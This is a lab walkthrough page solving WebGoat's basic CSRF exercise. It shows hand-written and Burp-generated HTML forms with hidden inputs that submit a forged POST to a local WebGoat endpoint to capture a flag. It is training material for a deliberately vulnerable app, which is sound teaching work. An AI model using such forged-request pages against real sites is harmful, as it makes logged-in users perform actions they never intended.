A10:2021 | Server Side Request Forgery | Cross Site Request Forgery (3) | Cycubix Docs

Basic Get CSRF Exercise

Trigger the form below from an external source while logged in. The response will include a ‘flag’ (a numeric value).

Confirm Flag

Confirm the flag you should have gotten on the previous page below.

Solution

With VC and HTML

• Hints: The form has hidden inputs. You will need to use an external page and/or script to trigger it. Try creating a local page or one that is uploaded and points to this form as its action. The trigger can be manual or scripted to happen automatically.
• If we hit the button submit we can see a message that says that the request its coming from the form itself.

• If we open the developer tools we can see the imputs the form has.

• To create your own fake page go into visual code, create an HTML with the following code:

<html>
  <body>
    <script>history.pushState('', '', '/');</script>
    <form action="http://localhost:8080/WebGoat/csrf/basic-get-flag" method="POST">
      <input type="hidden" name="csrf" value="false" />
      <input type="hidden" name="submit" value="Submit" />
      <input type="submit" value="Submit" />
    </form>
  </body>
</html>

• Save the file as a fakepage.html. Go to WebWolf and upload the file. You sill see that the file will open in a new tab, and you will see the submit button. Once you do that, you will see a JSON message with the flag number: copy and paste the flag number in WebGoat’s lesson.

With Engagement Tools on BurpSuite

• There is a tool (Pro Version only) that allows you to create a HTML based on the POST request.

```html
<form accept-charset="UNKNOWN" id="basic-csrf-get" method="POST" name="form1" target="_blank" action="http://127.0.0.1:8080/WebGoat/csrf/basic-get-flag">
    <input name="csrf" type="hidden" value="false">
    <input type="submit" name="submit">
</form>
```